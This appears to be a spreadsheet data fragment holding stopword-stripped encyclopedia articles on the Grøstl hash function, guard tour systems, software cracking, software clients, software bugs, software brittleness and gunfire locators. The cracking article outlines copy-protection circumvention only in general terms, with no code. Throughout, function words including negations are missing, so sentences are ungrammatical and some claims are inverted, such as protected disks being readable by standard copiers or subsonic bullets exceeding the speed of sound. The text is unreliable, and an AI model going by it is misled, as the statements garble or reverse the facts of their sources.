    <t>grøstl cryptographic hash function submitted nist hash function competition praveen gauravaram, lars knudsen, krystian matusiewicz, florian mendel, christian rechberger, martin schläffer, søren thomsen. grøstl chosen five finalists competition. uses s-box custom construction. authors claim speeds 21.4 cycles byte intel core duo, cycles/byte intel aes-ni. according submission document, name "grøstl" multilingual play-on-words, referring austrian dish similar hash (food). like hash functions md5/sha family, grøstl divides input blocks iteratively computes f(hi−1, mi). however, grøstl maintains hash state least twice size final output (512 1024 bits), truncated hash computation. compression function based pair 256- 512-bit permutation functions defined f(h, q(m) hthe permutation functions heavily based rijndael (aes) block cipher, operate 8×16 arrays bytes, rather 4×4. like aes, round consists four operations: addroundkey (the grøstl round keys fixed, differ subbytes (this uses rijndael s-box, allowing sharing implementations) shiftbytes (expanded compared aes, also differs 512- 1024-bit versions) mixcolumns (using matrix rather rijndael's 4×4)unlike rijndael, rounds identical final addroundkey operation. rounds recommended 512-bit permutation, rounds 1024-bit version. final double-width hash receives final output transformation ω(h) p(h)and truncated desired width. this equivalent applying final iteration compression function using all-zero message block followed (cryptographically insignificant) exclusive-or fixed constant q(0). examples grøstl hashes hash values empty string. grøstl-224("") f2e180fb5947be964cd584e22e496242c6a329c577fc4ce8c36d34c3 grøstl-256("") 1a52d11d550039be16107f9c58db9ebcc417f16f736adb2502567119f0083467 grøstl-384("") ac353c1095ace21439251007862d6c62f829ddbe6de4f78e68d310a9205a736d8b11d99bffe448f57a1cfa2934f044a5 grøstl-512("") 6d3ad29d279110eef3adbd66de2a0345a77baede1557f5d099fce0c03d6dc2ba8e6d4a6633dfbd66053c20faa87d1a11f39a7fbe4a6c2f009801370308fc4ad8 even small change message (with overwhelming probability) result mostly different hash, avalanche effect. example, adding period sentence: grøstl-256("the quick brown jumps lazy dog") 8c7ad62eb26a21297bc39c2d7293b4bd4d3399fa8afab29e970471739e28b301 grøstl-256("the quick brown jumps lazy dog.") f48290b1bcacee406a0429b993adb8fb3d065f4b09cbcdb464a631d4a0080aaf references external links grøstl site vhdl source code developed cryptographic engineering research group (cerg) george mason university</t>
  </si>
  <si>
    <t>Guard tour patrol system</t>
  </si>
  <si>
    <t>guard tour patrol system system logging rounds employees variety situations security guards patrolling property, technicians monitoring climate-controlled environments, correctional officers checking prisoner living areas. helps ensure employee makes appointed rounds correct intervals offer record legal insurance reasons. such systems existed many years using mechanical watchclock-based systems (watchman clocks/guard tour clocks/patrol clocks). computerized systems first introduced europe early 1980s, north america 1986. modern systems based handheld data loggers rfid sensors. system provides means record time employee reaches certain points tour. checkpoints watchstations commonly placed extreme ends tour route critical points vaults, specimen refrigerators, vital equipment, access points. some systems interval stations timed employee fails reach point within time, staff dispatched ensure employee's well-being. example modern set-up might work follows: employee carries portable electronic sensor (pes) electronic data collector activated checkpoint. checkpoints consist ibutton semiconductors, magnetic strips, proximity microchips rfids nfc- optical barcodes. data collector stores serial number checkpoint date time. later, information downloaded collector computer checkpoint's serial number assigned location (i.e. north perimeter fence, cell number etc.). data collectors also programmed ignore duplicate checkpoint activations occur sequentially within certain time period. computer software used compile data collector print summaries pinpoint missed checkpoints patrols without operator review data collected. because devices subject misuse, built-in microwave, g-force, voltage detection. system composition combines readers, tags software. guard patrol reader first guard tour system touch readers software. upon development, working modes readers became available. such rfid gps. communication readers software connected cables download stations. connection, pogo connection popular. because contacts gold-plating stable waterproof. newer, light-weight guard touring systems utilize codes barcodes rather expensive electronic components. mobile phone used scan (take photo) code creates time stamp system. guard patrol tags reader needs read tags record information, time tag's then upload information software report. guard tags: touch ibuttons rfid tags. guard tags replace name guard. checkpoint tags: touch ibuttons rfid tags. checkpoint tags replace checkpoints guards need patrol. event wallets: many event tags touch ibuttons rfid tags. each means event thing. when reader reads tag, event. example, fire, stolen, broken. codes: systems codes barcodes instead electronic tags associated readers. codes often printed stickers easily placed nearly anywhere, changed ensure accountability) added change touring routes. guard patrol software there three types guard patrol software. they desktop, local network client-server, web-based versions. desktop version work computer. local network client server type work using local area network. web-based version work everywhere internet access. analog age, device used purpose watchclock. watchclocks often paper light cardboard disk placed inside 24-hour period. user would carry clock checkpoint, numbered could found (typically chained place). would inserted clock would imprint disk. shift 24-hour period authorized person (usually supervisor) would unlock watchclock retrieve disk. development guard tour system, device work functions. such send data real-time gprs software location tracking mode. software, patrol department, patrol route, guard, checkpoint, event patrol plan general, depending software purchased. software specific tours officers complete, able indicate whether inspection completed properly not, ability note specific temperature inspection, make kind notes necessary. guard tour software systems seem becoming norm tracking tours officers. touring solutions rely cloud-based software service (saas) combined mobile fixed on-site devices. these offer advantages lower installation maintenance costs, forgoing need hardware, software upgrades, data backups computer maintenance. on-site systems need usual software patches, backups periodic hardware replacement. operation, role watchclock system, described above, largely replaced combination gps, rfid/nfc, coded labels. users prove visited particular locations performed tasks scanning tags generated maps. these technologies result lower costs, increasing flexibility systems handle changes uses. this important routes change, solution needed short notice. tag-based touring systems typically utilize mobile phone tablet scan tags upload information along time stamp, phone's location information, optionally information guard enters phone. these systems provide instant access tour information uploaded application device carried user, rather requiring officer return upload station. references</t>
  </si>
  <si>
    <t>Software cracking</t>
  </si>
  <si>
    <t>software cracking (known "breaking" mostly 1980s) modification software remove disable features considered undesirable person cracking software (software cracker), especially copy protection features (including protection manipulation software, serial number, hardware key, date checks disc check) software annoyances like screens adware. crack refers means achieving, example stolen serial number tool performs cracking. some tools called keygen, patch, loader, no-disc crack. keygen handmade product serial number generator often offers ability generate working serial numbers name. patch small computer program modifies machine code another program. this advantage cracker include large executable release bytes changed. loader modifies startup flow program remove protection circumvents well-known example loader trainer used cheat games. fairlight pointed .nfo files type cracks allowed warez scene game releases. nukewar shown protection kick point valid crack.the distribution cracked copies illegal countries. there lawsuits cracking software. might legal cracked software certain circumstances. educational resources reverse engineering software cracking are, however, legal available form crackme programs. history first software copy protection applied software apple atari 8-bit family, commodore computers.. software publishers implemented increasingly complex methods effort stop unauthorized copying software. apple operating system directly controls step motor moves floppy drive head, also directly interprets data, called nibbles, read track identify data sectors. this allowed complex disk-based software copy protection, storing data half tracks 2.5, 3.5, 6...), quarter tracks 2.25, 3.75, 6...), combination thereof. addition, tracks need perfect rings, could sectioned sectors could staggered across overlapping offset tracks, extreme version known spiral tracking. also discovered many floppy drives fixed upper limit head movement, sometimes possible write additional 36th track normal tracks. standard apple copy programs could read protected floppy disks, since standard assumed disks uniform 35-track, 16-sector layout. special nibble-copy programs locksmith copy plus could sometimes duplicate disks using reference library known protection methods; protected programs cracked would completely stripped copy protection system, transferred onto standard format disk normal apple copy program could read. primary routes hacking early copy protections program simulates normal operation. simulator provides number extra features hacker, ability single-step processor instruction examine registers modified memory spaces simulation runs (any modern disassembler/debugger this). apple provided built-in opcode disassembler, allowing memory decoded opcodes, would utilized examine copy-protection next. generally little defense available copy protection system, since secrets made visible simulation. however, simulation must original cpu, addition software hacked, simulation would often extremely slowly even maximum speed. atari 8-bit computers, common protection method "bad sectors". these sectors disk intentionally unreadable disk drive. software would look sectors program loading would stop loading error code returned accessing sectors. special copy programs available would copy disk remember sectors. user could application spin drive constantly reading single sector display drive rpm. with disk drive removed small screwdriver could used slow drive certain point. once drive slowed application could write "bad sectors" needed. when done drive sped back normal uncracked copy made. course cracking software expect good sectors made readily copied disks without need meddle disk drive. time went sophisticated methods developed, almost involved form malformed disk data, sector might return different data separate accesses data alignment. products became available (from companies happy computers) replaced controller bios atari's "smart" drives. these upgraded drives allowed user make exact copies original program copy protections place disk. commodore several methods used protect software. software distributed cartridges, subroutines included attempted write program code. software rom, nothing would happen, software moved ram, software would disabled. because operation commodore floppy drives, write protection scheme would cause floppy drive head bang rail, could cause drive head become misaligned. cases, cracked versions software desirable avoid result. misaligned drive head rare usually fixing smashing rail stops. another brutal protection scheme grinding track back times. most early software crackers computer hobbyists often formed groups competed cracking spreading software. breaking copy protection scheme quickly possible often regarded opportunity demonstrate one's technical superiority rather possibility money-making. software crackers usually benefit materially actions motivation challenge removing protection. some skilled hobbyists would take already cracked software edit various unencrypted strings text change messages game would tell game player, often something considered vulgar. uploading altered copies file sharing networks provided source laughs adult users. cracker groups 1980s started advertise skills attaching animated screens known crack intros software programs cracked released. once technical competition expanded challenges cracking challenges creating visually stunning intros, foundations subculture known demoscene established. demoscene started separate illegal "warez scene" 1990s regarded completely different subculture. many software crackers later grown extremely capable software reverse engineers; deep knowledge assembly required order crack protections enables reverse engineer drivers order port binary-only drivers windows drivers source code linux free operating systems. also music game intro integral part gaming music format graphics became popular hardware became affordable home user. with rise internet, software crackers developed secretive online organizations. latter half nineties, respected sources information "software protection reversing" fravia's website. +hcu high cracking university (+hcu) founded cracker (+orc), considered genius reverse engineering legendary figure rce, advance research reverse code engineering (rce). also taught authored many papers subject, texts considered classics field mandatory reading students rce.the addition sign front nickname reverser signified membership +hcu. amongst students +hcu elite windows reversers worldwide. +hcu published reverse engineering problem annually small number respondents best replies qualified undergraduate position university.+fravia professor +hcu. fravia's website known "+fravia's pages reverse engineering" used challenge programmers well wider society "reverse engineer" "brainwashing corrupt rampant materialism". heyday, website received millions visitors year influence "widespread". site, +fravia also maintained database tutorials generated +hcu students posterity.nowadays graduates +hcu migrated linux remained windows reversers. information university rediscovered generation researchers practitioners started research projects field. methods common software crack modification application's binary cause prevent specific branch program's execution. this accomplished reverse engineering compiled program code using debugger softice, ollydbg, gdb, macsbug software cracker reaches subroutine contains primary method protecting software disassembling executable file program ida). binary modified using debugger editor hiew monitor manner replaces prior branching opcode complement opcode branch either always execute specific subroutine skip almost common software cracks variation type. proprietary software developers constantly developing techniques code obfuscation, encryption, self-modifying code make modification increasingly difficult. even measures taken, developers struggle combat software cracking. this common professional publicly release simple cracked retrium installer public download, eliminating need inexperienced users crack software themselves. specific example technique crack removes expiration period time-limited trial application. these cracks usually programs alter program executable sometimes .dll linked application process altering original binary files called patching. similar cracks available software requires hardware dongle. company also break copy protection programs legally purchased licensed particular hardware, risk downtime hardware failure (and, course, need restrict oneself running software bought hardware only). another method special software clonecd scan commercial copy protection application. after discovering software used protect application, another tool used remove copy protection software dvd. this enable another program alcohol 120%, clonedvd, game jackal, daemon tools copy protected software user's hard disk. popular commercial copy protection applications scanned include safedisc starforce.in cases, might possible decompile program order access original source code code level higher machine code. this often possible scripting languages languages utilizing compilation. example cracking debugging) .net platform might consider manipulating achieve one's needs. java's bytecode also works similar fashion intermediate language program compiled platform dependent machine code.advanced reverse engineering protections securom, safedisc, starforce, denuvo requires cracker, many crackers spend much time studying protection, eventually finding every flaw within protection code, coding tools "unwrap" protection automatically executable (.exe) library (.dll) files. there number sites internet users download cracks produced warez groups popular games applications (although danger acquiring malicious software sometimes distributed sites). although cracks used legal buyers software, also used people downloaded otherwise obtained unauthorized copies (often networks). also reverse engineering references</t>
  </si>
  <si>
    <t>Software client</t>
  </si>
  <si>
    <t>computing, client piece computer hardware software accesses service made available server part client–server model computer networks. server often (but always) another computer system, case client accesses service network.a client computer program that, part operation, relies sending request another program computer hardware software accesses service made available server (which located another computer). example, browsers clients connect servers retrieve pages display. email clients retrieve email mail servers. online chat uses variety clients, vary chat protocol used. multiplayer video games online video games client computer. term "client" also applied computers devices client software users client software. client part client–server model, still used today. clients servers computer programs machine connect inter-process communication techniques. combined internet sockets, programs connect service operating possibly remote system internet protocol suite. servers wait potential clients initiate connections accept. term first applied devices capable running stand-alone programs, could interact remote computers network. these computer terminals clients time-sharing mainframe computer. types classification, client computers devices either thick clients, thin clients, diskless nodes. thick thick client, also known rich client client, client performs bulk data processing operations itself, necessarily rely server. personal computer common example client, relatively large features capabilities light reliance upon server. example, computer running program (such krita sketchup) ultimately shares result work network thick client. computer runs almost entirely standalone machine save send receive files network standard called workstation. thin thin client minimal sort client. thin clients resources host computer. thin client generally presents processed data provided application server, performs bulk required data processing. device using application (such office apps) thin client. diskless node diskless node mixture client models. similar client, processes locally, relies server storing persistent data. this approach offers features client (multimedia support, high performance) thin client (high manageability, flexibility). device running online version video game diablo example diskless node. references</t>
  </si>
  <si>
    <t>Software bug</t>
  </si>
  <si>
    <t>software error, flaw fault design, development, operation computer software causes produce incorrect unexpected result, behave unintended ways. process finding correcting bugs termed "debugging" often uses formal techniques tools pinpoint bugs. since 1950s computer systems designed deter, detect auto-correct various computer bugs operations. bugs software arise mistakes errors made interpreting extracting users' requirements, planning program's design, writing source code, interaction humans, hardware programs, operating systems libraries. program many, serious, bugs often described buggy. bugs trigger errors ripple effects. effects bugs subtle, unintended text formatting, obvious effects causing program crash, freezing computer, causing damage hardware. other bugs qualify security bugs might, example, enable malicious user bypass access controls order obtain unauthorized privileges.some software bugs linked disasters. bugs code controlled therac-25 radiation therapy machine directly responsible patient deaths 1980s. 1996, european space agency's us$1 billion prototype ariane rocket destroyed less minute launch on-board guidance computer program. 1994, chinook helicopter crashed, killing initially blamed pilot error, later thought caused software engine-control computer. buggy software caused early 21st century british post office scandal, widespread miscarriage justice british legal history.in 2002, study commissioned department commerce's national institute standards technology concluded "software bugs, errors, prevalent detrimental cost economy estimated billion annually, percent gross domestic product". history middle english word bugge basis terms "bugbear" "bugaboo" terms used monster.the term "bug" describe defects part engineering jargon since 1870s predates electronics computers; originally used hardware engineering describe mechanical malfunctions. instance, thomas edison wrote letter associate 1878: difficulties arise—this thing gives "bugs"—as little faults difficulties called—show baffle ball, first mechanical pinball game, advertised "free bugs" 1931. problems military gear world referred bugs glitches). book published 1942, louise dickinson rich, speaking powered cutting machine, said, "ice sawing suspended creator could brought take bugs darling."isaac asimov used term "bug" relate issues robot short story "catch that rabbit", published 1944. term "bug" used account computer pioneer grace hopper, publicized cause malfunction early electromechanical computer. typical version story 1946, hopper released active duty, joined harvard faculty computation laboratory continued work mark mark iii. operators traced error mark moth trapped relay, coining term bug. this carefully removed taped book. stemming first bug, today call errors glitches program bug. hopper present found, became favorite stories. date book september 1947. operators found including william "bill" burke, later naval weapons laboratory, dahlgren, virginia, familiar engineering term amusedly kept insect notation "first actual case found." this book, complete attached moth, part collection smithsonian national museum american history.the related term "debug" also appears predate usage computing: oxford english dictionary's etymology word contains attestation 1945, context aircraft engines.the concept software might contain errors dates back lovelace's 1843 notes analytical engine, speaks possibility program "cards" charles babbage's analytical engine erroneous: analysing process must equally performed order furnish analytical engine necessary operative data; herein also possible source error. granted actual mechanism unerring processes, cards give wrong orders. "bugs system" report open technology institute, group, america, released report "bugs system" august 2016 stating u.s. policymakers make reforms help researchers identify address software bugs. report "highlights need reform field software vulnerability discovery disclosure." report's authors said congress done enough address cyber software vulnerability, even though congress passed number bills combat larger issue cyber security.government researchers, companies, cyber security experts people typically discover software flaws. report calls reforming computer crime copyright laws. computer fraud abuse act, digital millennium copyright electronic communications privacy criminalize create civil penalties actions security researchers routinely engage conducting legitimate security research, report said. terminology while term "bug" describe software errors common, many suggested abandoned. argument word "bug" divorced sense human caused problem, instead implies defect arose own, leading push abandon term "bug" favor terms "defect", limited success. since 1970s gary kildall somewhat humorously suggested term "blunder".in software engineering, mistake metamorphism (from greek meta "change", morph "form") refers evolution defect final stage software deployment. transformation "mistake" committed analyst early stages software development lifecycle, leads "defect" final stage cycle called 'mistake metamorphism'.different stages "mistake" entire cycle described "mistakes", "anomalies", "faults", "failures", "errors", "exceptions", "crashes", "glitches", "bugs", "defects", "incidents", "side effects". prevention software industry much effort reducing counts. these include: typographical errors bugs usually appear programmer makes logic error. various innovations programming style defensive programming designed make bugs less likely, easier spot. some typos, especially symbols logical/mathematical operators, allow program operate incorrectly, others missing symbol misspelled name prevent program operating. compiled languages reveal typos source code compiled. development methodologies several schemes assist managing programmer activity fewer bugs produced. software engineering (which addresses software design issues well) applies many techniques prevent defects. example, formal program specifications state exact behavior programs design bugs eliminated. unfortunately, formal specifications impractical anything shortest programs, problems combinatorial explosion indeterminacy. unit testing involves writing test every function (unit) program perform. test-driven development unit tests written code code considered complete tests complete successfully. agile software development involves frequent software releases relatively small changes. defects revealed user feedback. open source development allows anyone examine source code. school thought popularized eric raymond linus's says popular open-source software chance bugs software, "given enough eyeballs, bugs shallow". this assertion disputed, however: computer security specialist elias levy wrote easy hide vulnerabilities complex, little understood undocumented source code," because, "even people reviewing code, mean they're qualified so." example open-source software 2008 openssl vulnerability debian. programming language support programming languages include features help prevent bugs, static type systems, restricted namespaces modular programming. example, programmer writes (pseudocode) real_value "three bit", although syntactically correct, code fails type check. compiled languages catch without program. interpreted languages catch errors runtime. some languages deliberately exclude features easily lead bugs, expense slower performance: general principle that, almost always better write simpler, slower code inscrutable code runs slightly faster, especially considering maintenance cost substantial. example, java programming language support pointer arithmetic; implementations languages pascal scripting languages often runtime bounds checking arrays, least debugging build. code analysis tools code analysis help developers inspecting program text beyond compiler's capabilities spot potential problems. although general problem finding programming errors given specification solvable (see halting problem), tools exploit fact human programmers tend make certain kinds simple mistakes often writing software. instrumentation tools monitor performance software running, either specifically find problems bottlenecks give assurance correct working, embedded code explicitly (perhaps simple statement saying print here"), provided tools. often surprise find time taken piece code, removal assumptions might cause code rewritten. testing software testers people whose primary task find bugs, write code support testing. projects, resources spent testing developing program. measurements testing provide estimate number likely bugs remaining; becomes reliable longer product tested developed. debugging finding fixing bugs, debugging, major part computer programming. maurice wilkes, early computing pioneer, described realization late 1940s much rest life would spent finding mistakes programs.usually, difficult part debugging finding bug. once found, correcting usually relatively easy. programs known debuggers help programmers locate bugs executing code line line, watching variable values, features observe program behavior. without debugger, code added messages values written console window file trace program execution show values. however, even debugger, locating bugs something art. uncommon section program cause failures completely different section, thus making especially difficult track (for example, error graphics rendering routine causing file routine fail), apparently unrelated part system. sometimes, isolated flaw, represents error thinking planning part programmer. such logic errors require section program overhauled rewritten. part code review, stepping code imagining transcribing execution process often find errors without ever reproducing such. more typically, first step locating reproduce reliably. once reproducible, programmer debugger tool reproducing error find point program went astray. some bugs revealed inputs difficult programmer re-create. cause therac-25 radiation machine deaths (specifically, race condition) occurred machine operator rapidly entered treatment plan; took days practice become able this, manifest testing manufacturer attempted duplicate other bugs stop occurring whenever setup augmented help find bug, running program debugger; called heisenbugs (humorously named heisenberg uncertainty principle). since 1990s, particularly following ariane flight disaster, interest automated aids debugging rose, static code analysis abstract interpretation.some classes bugs nothing code. faulty documentation hardware lead problems system use, even though code matches documentation. cases, changes code eliminate problem even though code longer matches documentation. embedded systems frequently work around hardware bugs, since make version much cheaper remanufacturing hardware, especially commodity items. benchmark bugs facilitate reproducible research testing debugging, researchers curated benchmarks bugs: siemens benchmark manybugs benchmark bugs nine open-source programs. defects4j benchmark java bugs open-source projects. contains corresponding patches, cover variety patch type. bears benchmark continuous integration build failures focusing test failures. created monitoring builds open-source projects travis management management includes process documenting, categorizing, assigning, reproducing, correcting releasing corrected code. proposed changes software bugs well enhancement requests even entire releases commonly tracked managed using tracking systems issue tracking systems. items added called defects, tickets, issues, following agile development paradigm, stories epics. categories objective, subjective combination, version number, area software, severity priority, well type issue feature request bug. triage reviews bugs decides whether them. decision based bug's priority, factors project schedules. triage meant investigate cause bugs, rather cost fixing them. triage happens regularly, goes bugs opened reopened since previous meeting. attendees triage process typically project manager, development manager, test manager, build manager, technical experts. severity severity intensity impact system operation. this impact data loss, financial, loss goodwill wasted effort. severity levels standardized. impacts differ across industry. crash video game totally different impact crash browser, real time monitoring system. example, severity levels might "crash hang", workaround" (meaning customer accomplish given task), "has workaround" (meaning user still accomplish task), "visual defect" (for example, missing image displaced button form element), "documentation error". some software publishers qualified severities "critical", "high", "low", "blocker" "trivial". severity separate category priority fixing, quantified managed separately. priority priority controls falls list planned changes. priority decided software producer. priorities numerical, named, "critical", "high", "low", "deferred". these rating scales similar even identical severity ratings, evaluated combination bug's severity estimated effort fix; severity easy higher priority moderate severity requires excessive effort fix. priority ratings aligned product releases, "critical" priority indicating bugs must fixed next software release. software releases common practice release software known, low-priority bugs. bugs sufficiently high priority warrant special release part code containing modules fixes. these known patches. most releases include mixture behavior changes multiple fixes. releases emphasize fixes known maintenance releases, differentiate major releases emphasize feature additions changes. reasons software publisher opts patch even particular include: deadline must resources insufficient bugs deadline. already fixed upcoming release, high priority. changes required costly affect many components, requiring major testing activity. suspected, known, users relying existing buggy behavior; proposed introduce breaking change. problem area obsolete upcoming release; fixing unnecessary. "it's bug, feature". misunderstanding arisen expected perceived behavior undocumented feature. types software development projects, mistake error introduced stage. bugs arise oversight misunderstanding software team specification, design, coding, configuration, data entry documentation. example, relatively simple program alphabetize list words, design might fail consider happen word contains hyphen. converting abstract design code, coder might inadvertently create off-by-one error "&lt;=" intended, fail sort last word list. another category called race condition occur programs multiple components executing time. components interact different order developer intended, could interfere stop program completing tasks. these bugs difficult detect anticipate, since occur every execution program. conceptual errors developer's misunderstanding software must resulting software perform according developer's understanding, really needed. other types: arithmetic operations numerical values, problems arise result unexpected output, slowing process, crashing. these lack awareness qualities data storage loss precision rounding, numerically unstable algorithms, arithmetic overflow underflow, lack awareness calculations handled different software coding languages division zero languages throw exception, others return special value infinity. control flow control flow bugs found processes valid logic, lead unintended results, infinite loops infinite recursion, incorrect comparisons conditional statements using incorrect comparison operator, off-by-one errors (counting many iterations looping). interfacing incorrect usage. incorrect protocol implementation. incorrect hardware handling. incorrect assumptions particular platform. incompatible systems. communications protocol seem work systems different versions, errors occur function feature implemented version changed missing another. production systems must continually, shutting entire system major update possible, telecommunication industry internet. case, smaller segments large system upgraded individually, minimize disruption large network. however, sections could overlooked upgraded, cause compatibility errors difficult find repair. incorrect code annotations multi-threading deadlock, task cannot continue task finishes, time, task cannot continue task finishes. race condition, computer perform tasks order programmer intended. concurrency errors critical sections, mutual exclusions features concurrent processing. time-of-check-to-time-of-use (toctou) form unprotected critical section. resourcing null pointer dereference. using uninitialized variable. using otherwise valid instruction wrong data type (see packed decimal/binary-coded decimal). access violations. resource leaks, finite system resource (such memory file handles) become exhausted repeated allocation without release. buffer overflow, program tries store data past allocated storage. this lead access violation storage violation. these known security bugs. excessive recursion which—though logically valid—causes stack overflow. use-after-free error, pointer used system freed memory references. double free error. syntax wrong token, performing assignment instead equality test. example, languages value x==5 check whether currently number. interpreted languages allow code fail. compiled languages catch errors testing begins. teamwork unpropagated updates; e.g. programmer changes "myadd" forgets change "mysubtract", uses algorithm. these errors mitigated don't repeat yourself philosophy. comments date incorrect: many programmers assume comments accurately describe code. differences documentation product. implications amount type damage software cause naturally affects decision-making, processes policy regarding software quality. applications human spaceflight, aviation, nuclear power, health care, public transport automotive safety, since software flaws potential cause human injury even death, software scrutiny quality control than, example, online shopping website. applications banking, software flaws potential cause serious financial damage bank customers, quality control also important than, say, photo editing application. nasa's software assurance technology center managed reduce number errors fewer 1000 lines code (sloc) felt feasible projects business world. according nasa study "flight software complexity", exceptionally good software development process keep defects defect 10,000 lines code."other damage caused bugs, cost effort invested fixing them. 1978, lientz showed median projects invest cent development effort fixing. research 2020 github repositories showed median 20%. well-known bugs number software bugs become well-known, usually severity: examples include various space military aircraft crashes. possibly famous year 2000 problem bug, caused many programs written long transition 19xx 20xx dates malfunction, example treating date 1904, displaying "19100" instead "2000", huge effort 20th century resolved severe problems, major consequences. 2012 stock trading disruption involved incompatibility api. popular culture 1968 novel 2001: space odyssey corresponding 1968 film 2001: space odyssey, spaceship's onboard computer, 9000, attempts kill crew members. follow-up 1982 novel, 2010: odyssey two, accompanying 1984 film, 2010, revealed action caused computer programmed conflicting objectives: fully disclose information, keep true purpose flight secret crew; conflict caused become paranoid eventually homicidal. english version nena 1983 song luftballons balloons) result "bugs software", release group balloons mistaken enemy nuclear missile launch, requiring equivalent launch response, resulting catastrophe. 1999 american comedy office space, three employees attempt (unsuccessfully) exploit company's preoccupation computer using computer virus sends rounded-off fractions penny bank account—a long-known technique described salami slicing. 2004 novel bug, ellen ullman, programmer's attempt find elusive database application. 2008 canadian film control delete computer programmer 1999 struggling bugs company related year 2000 problem. also anti-pattern bounty program glitch removal iso/iec 9126, classifies either defect nonconformity orthogonal defect classification racetrack problem risks digest software defect indicator software regression software automatic fixing references external links "common weakness enumeration" expert webpage focus bugs, nist.gov type gray another type picture "first computer bug" wayback machine (archived january 2015) "the first computer bug!" email 1981 adm. hopper's "toward understanding compiler bugs llvm". 2016 study bugs compilers</t>
  </si>
  <si>
    <t>Software brittleness</t>
  </si>
  <si>
    <t>computer programming software engineering, software brittleness increased difficulty fixing older software appear reliable, actually fails badly presented unusual data altered seemingly minor way. phrase derived analogies brittleness metalworking. causes when software new, malleable; formed whatever wanted implementers. software given project grows larger larger, develops larger base users long experience software, becomes less less malleable. like metal work-hardened, software becomes legacy system, brittle unable easily maintained without fracturing entire system. brittleness software caused algorithms work well full range input data. good example algorithm allows divide zero occur, curve-fitting equation used extrapolate beyond data fitted another cause brittleness data structures restrict values. this commonly seen late 1990s people realized software room digit year entry; sudden updating tremendous quantities brittle software year 2000. another commonly encountered form brittleness graphical user interfaces make invalid assumptions. example, user running resolution display, software open window large display. another common problem expressed user uses color scheme default, causing text rendered color background, user uses font default, allowed space cuts instructions labels. very often, code base simply abandoned brand-new system (which intended free many burdens legacy system) created scratch, expensive time-consuming process. some examples reasons behind software brittleness: users expect relatively constant user interface; feature implemented exposed users, difficult convince accept major changes feature, even feature well designed existence feature blocks progress. great deal documentation describe current behavior would expensive change. addition, essentially impossible recall copies existing documentation, users likely continue refer obsolete manuals. original implementers (who knew things really worked) moved left insufficient documentation internal workings software. many small implementation details understood oral traditions design team, many details eventually irretrievably lost, although rediscovered diligent (and expensive) application software archaeology. patches probably issued throughout years, subtly changing behavior software. many cases, patches, correcting overt failure issued, introduce other, subtle, failures system. detected regression testing, subtle failures make subsequent changes system difficult. more subtle forms brittleness commonly occur artificial intelligence systems. these systems often rely significant assumptions input data. when assumptions and, stated, easily case system respond completely unpredictable ways. systems also brittle component dependencies rigid. example seen difficulties transitioning versions dependencies. when component expects another output given range values, range changes, cause errors ripple system, either building runtime. fewer technical resources available support changes system maintenance phase system development implementation phase systems development life cycle (sdlc). also brittle system software entropy software robustness (computer science) references robert filman; tzilla elrad; siobhán clarke; mehmet aksit (2004). aspect-oriented dependency management. addison wesley professional. isbn 0-321-21976-7. archived original january 2013. anastasios manessis, adrian hilton, phil mclauchlan phil palmer (2000). statistical geometric framework reconstruction scene models" (pdf). british machine vision conference.{{cite journal}}: maint: multiple names: authors list (link) virginia postrel (1999). "power fantasies: strange appeal year 2000 transition problem". reason. archived original 2005-09-10. retrieved 2008-07-25.</t>
  </si>
  <si>
    <t>Gunfire locator</t>
  </si>
  <si>
    <t>gunfire locator gunshot detection system system detects conveys location gunfire weapon fire using acoustic, vibration, optical, potentially types sensors, well combination sensors. these systems used enforcement, security, military, government offices, schools businesses identify source and, cases, direction gunfire and/or type weapon fired. most systems possess three main components: array microphones sensors (accelerometers, infrared detectors, etc) either co-located geographically dispersed processing unit user-interface displays gunfire alertsin general categories, environmental packaged systems primarily outdoor (both military civilian/urban) high cost also lower cost consumer/industrial packaged systems primarily indoor use. systems used urban settings integrate geographic information system display includes address location incident. some indoor gunfire detection systems utilize detailed floor plans detector location overlay show shooter locations based interface. history determination origin gunfire sound conceived world first used operationally (see: artillery sound ranging). 1990, unique algorithm used starting point metravib defence, working délégation générale pour l’armement (dga) french defence procurement agency studied acoustic signature submarines. section technique l’armée terre (stat), french army’s engineering section subsequently commissioned metravib find solution shot detection, assist soldiers peacekeepers come fire snipers without knowing precisely shots coming from. early 1990s, areas east palo alto eastern menlo park, california, besieged crime. during 1992 homicides east palo alto, resulted east palo alto becoming murder capital united states. menlo park police department often called upon investigate residents reported gunshots; however determine source scattered calls. late 1992, john lahr, seismologist nearby united states geological survey, approached menlo park police department would interested applying seismological techniques locate gunshots. others also approached menlo park police department suggesting ways help police means gunshot location systems. police chief arranged meeting local inventors entrepreneurs expressed interest problem. time solutions tracking gunshots, desire attendee robert showen, stanford research institute employee expert acoustics.lahr decided ahead plans demonstrate feasibility locating gunshots, relying background earthquake location techniques monitoring alaska. network consisting wired four radio-telemetered microphones established, home eastern menlo park becoming command center. lahr modified software typically used locating earthquakes recorded data higher sample rate used regional seismology. after gunshots heard, lahr would determine location wife monitored police radio independent confirmation source. using system, lahr able demonstrate police others technique highly effective, system able locate gunshots occurring within array within tens meters. although additional techniques seismic world known could better automate system increase reliability, improvements outside scope feasibility study. gunfire characteristics there three primary attributes characterize gunfire hence enable detection location gunfire similar weapon discharges: optical flash occurs explosive charge ignited propel projectile chamber weapon typical muzzle blast generates impulse sound wave sound pressure level (spl) ranges shock wave occurs projectile moves supersonic speed. note, apply subsonic ammunition, whose bullet projectiles exceed 1120 feet second (i.e. speed sound air).optical flashes detected using optical and/or infrared sensing techniques; however must line sight sensor weapon, otherwise flash seen. indirect flashes bounce nearby structures walls, trees, rocks assist exposing concealed limited line-of-sight detections weapon sensor. because optical flashes detected, systems typically capable determining bearing discharge relative sensor unless multiple systems triangulate shot range. multiple gunshots, fired multiple locations nearly time, easily discriminated separate gunshots sensors generally utilize focal plane array consisting many sensitive pixels. each pixel entire focal plane (e.g. 640×480 pixels) constantly evaluated. projectile generally must travel within meters sensor order sensor hear shockwave. combination muzzle blast shockwave provides additional information used along physics acoustics sound propagation determine range discharge sensor, especially round type projectile known. assault rifles commonly used battle scenarios important potential targets immediately alerted position enemy fire. system hear minute differences arrival time muzzle blast also hear projectile's shockwave “snap” calculate origin discharge. multiple gunshots, fired multiple locations nearly time, found ambush, provide ambiguous signals resulting location ambiguities. gunfire acoustics must distinguished reliably noises sound similar, firework explosions cars backfiring. urban areas typically exhibit diurnal noise patterns background noise higher daytime lower night, noise floor directly correlates urban activity (e.g., automobile traffic, airplane traffic, construction, on). during day, noise floor higher, typical handgun muzzle blast propagate much mile. during night, noise floor lower, typical handgun muzzle blast propagate much miles. therefore, co-located array microphones distributed array acoustic sensors hear muzzle blast different times contribute calculating location origin discharge provided 